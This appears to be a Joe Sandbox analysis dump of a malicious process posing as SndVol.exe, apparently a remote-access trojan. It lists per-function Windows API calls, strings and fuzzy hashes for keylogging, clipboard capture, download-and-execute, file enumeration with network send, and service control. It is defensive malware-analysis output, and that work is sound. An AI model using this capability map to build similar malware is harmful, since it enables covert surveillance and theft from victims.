Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
String ID:
API String ID: 1824512719-0
Opcode ID: 2d04ef65f79b6d4a761471fa0904ac1a104409f79b1bf8440fe588cad0436fe0
Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
Opcode Fuzzy Hash: 2d04ef65f79b6d4a761471fa0904ac1a104409f79b1bf8440fe588cad0436fe0
Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98

Function 00410763 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
GetNativeSystemInfo.KERNEL32(?,0040BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041082E

Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0041084C,?,00000000,00003000,00000004,00000000,?,?), ref: 00410718

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00410875
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041087C
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041098F

Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C,?,?,?,?,?), ref: 00410B4C
Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00410B53

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID:
API String ID: 3950776272-0
Opcode ID: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
Opcode Fuzzy Hash: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9

Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
GetKeyboardLayout.USER32(00000000), ref: 004094AE
GetKeyState.USER32(00000010), ref: 004094B8
GetKeyboardState.USER32(?), ref: 004094C5
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: b347f1a6ebd5a27a3c62a6440ea9f983a5eff6272c066a99259600f45f129da1
Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
Opcode Fuzzy Hash: b347f1a6ebd5a27a3c62a6440ea9f983a5eff6272c066a99259600f45f129da1
Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4

Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 637da124ebd858597763fdc0195e491a5d188b8048d228e092eb7bdd2ad61358
Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
Opcode Fuzzy Hash: 637da124ebd858597763fdc0195e491a5d188b8048d228e092eb7bdd2ad61358
Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9

Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

Strings

`'G, xrefs: 00417C7E
H"G, xrefs: 00417BA1
`'G, xrefs: 00417DE4

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: H"G$`'G$`'G
API String ID: 341183262-2774397156
Opcode ID: 0f8a9a1f3f484a1b985d0c82ab7c6f8e3835b992157b22e43b4eb6e7c3e49d61
Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
Opcode Fuzzy Hash: 0f8a9a1f3f484a1b985d0c82ab7c6f8e3835b992157b22e43b4eb6e7c3e49d61
Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A

Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB

ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
GetProcAddress.KERNEL32(00000000), ref: 00414E72

Strings

SetSuspendState, xrefs: 00414E61
PowrProf.dll, xrefs: 00414E66

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: bb589c4a9e5ce4fb7329190ff839279ce61210147b3cfe0a03d1c41bdf58f902
Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
Opcode Fuzzy Hash: bb589c4a9e5ce4fb7329190ff839279ce61210147b3cfe0a03d1c41bdf58f902
Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE

Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3

Strings

ACP, xrefs: 0044F63A
OCP, xrefs: 0044F670

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398

Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE

Strings

SETTINGS, xrefs: 00419497

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19

Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004087A5
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
FindNextFileW.KERNEL32(00000000,?), ref: 00408846
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: bee7f5f2dbd26623ceae785115fe4ed72eb4a605c9ebee09c1c08c84f1d66a56
Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
Opcode Fuzzy Hash: bee7f5f2dbd26623ceae785115fe4ed72eb4a605c9ebee09c1c08c84f1d66a56
Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98

Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
IsValidCodePage.KERNEL32(00000000), ref: 0044F957
IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769

Function 04930588 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 049264BD: GetLastError.KERNEL32(?,0491FC32,0491932D,0491FC32,00471E90,?,0491D9B2,FF8BC35D,00471E90,00471E90), ref: 049264C1
Part of subcall function 049264BD: _free.LIBCMT ref: 049264F4
Part of subcall function 049264BD: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 04926535
Part of subcall function 049264BD: _abort.LIBCMT ref: 0492653B

Part of subcall function 049264BD: _free.LIBCMT ref: 0492651C
Part of subcall function 049264BD: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 04926529

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 04930694
IsValidCodePage.KERNEL32(00000000), ref: 049306EF
IsValidLocale.KERNEL32(?,00000001), ref: 049306FE
GetLocaleInfoW.KERNEL32(?,00001001,04922D16,00000040,?,04922E36,00000055,00000000,?,?,00000055,00000000), ref: 04930746
GetLocaleInfoW.KERNEL32(?,00001002,04922D96,00000040), ref: 04930765

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction ID: 79561d9c86c80e84a56c41261f42c59b8ba0051b9c093c7aefd3b84377746d70
Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction Fuzzy Hash: A2517071A00216AFEB20EFA5CC44ABE77BCFF86706F054579E954E7198E770E9008B61

Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040784D
FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
__CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 4df02c7b683598015195e59e2a1d7b54b12f13a119386a8b0a550fd93dbe50a1
Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
Opcode Fuzzy Hash: 4df02c7b683598015195e59e2a1d7b54b12f13a119386a8b0a550fd93dbe50a1
Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99

Function 004063C6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6

Strings

C:\Windows\SysWOW64\SndVol.exe, xrefs: 0040651D, 00406645
open, xrefs: 004064CC

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\SysWOW64\SndVol.exe$open
API String ID: 2825088817-1291576107
Opcode ID: 0200459f540584611f778afe4ab7dd214ac9f7c6233c4139519a742c6c6fbe69
Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
Opcode Fuzzy Hash: 0200459f540584611f778afe4ab7dd214ac9f7c6233c4139519a742c6c6fbe69
Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B

Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861

Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
Part of subcall function 0041215F: RegSetValueExA.KERNEL32(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
Part of subcall function 0041215F: RegCloseKey.KERNEL32(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1

Strings

TileWallpaper, xrefs: 0041A84B
WallpaperStyle, xrefs: 0041A7AC, 0041A7DF, 0041A82F
Control Panel\Desktop, xrefs: 0041A7A7, 0041A7DA, 0041A82A

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: b8e930e406a51c142911afe7d42b80e3a9af200f2f362c56483f6d5d18d4ce76
Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
Opcode Fuzzy Hash: b8e930e406a51c142911afe7d42b80e3a9af200f2f362c56483f6d5d18d4ce76
Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF

Function 0044EEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
_wcschr.LIBVCRUNTIME ref: 0044F02A
_wcschr.LIBVCRUNTIME ref: 0044F038
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769

Function 048E7665 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 048E7680
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 048E7748

Part of subcall function 048E5819: send.WS2_32(?,00000000,00000000,00000000), ref: 048E58AE

Strings

p2oup3ou 2ou, xrefs: 048E7748

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: p2oup3ou 2ou
API String ID: 4113138495-232651861
Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
Instruction ID: d78368d8f297177c57b3120ad05a1d3a4c8886e437feb489dc654379acc32b78
Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
Instruction Fuzzy Hash: E0218F316182059BD214FB69CC949FF77ACAF86318F404F29E986D2090EFB4BA098653

Function 004398AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004399A4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48

Function 0491A644 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0491A73C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0491A746
UnhandledExceptionFilter.KERNEL32(?), ref: 0491A753

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
Instruction ID: b336d78ad92822289cd784487db69a3cd5d0e40b76075b4379c5eb21bd187385
Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
Instruction Fuzzy Hash: D631C67590122C9BDB21DF64D9887CDBBB8BF48320F5041EAE81CA7260E7709F858F45

Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0044078B,?), ref: 004407D6
TerminateProcess.KERNEL32(00000000,?,0044078B,?), ref: 004407DD
ExitProcess.KERNEL32 ref: 004407EF

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

Function 0492154D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,04921523,00000000,0046B4F8,0000000C,0492167A,00000000,00000002,00000000), ref: 0492156E
TerminateProcess.KERNEL32(00000000,?,04921523,00000000,0046B4F8,0000000C,0492167A,00000000,00000002,00000000), ref: 04921575
ExitProcess.KERNEL32 ref: 04921587

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
Instruction ID: b44eb07eb5ba6ac15c2b0743794de7eeb92d90aecd91861eb75a2c86c5336655
Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
Instruction Fuzzy Hash: 22E0B631400A58AFCF517F64DE4AE983B79EB80296F4144B4F9068B536CB35E962CB44

Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040A65D
GetClipboardData.USER32(0000000D), ref: 0040A669
CloseClipboard.USER32 ref: 0040A671

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: fc42fbe939e34f95e3da0c1deb258c5860a889e64c116dd0334dc6fce6b72752
Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
Opcode Fuzzy Hash: fc42fbe939e34f95e3da0c1deb258c5860a889e64c116dd0334dc6fce6b72752
Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE

Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3

Strings

P@, xrefs: 004329DA

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID: P@
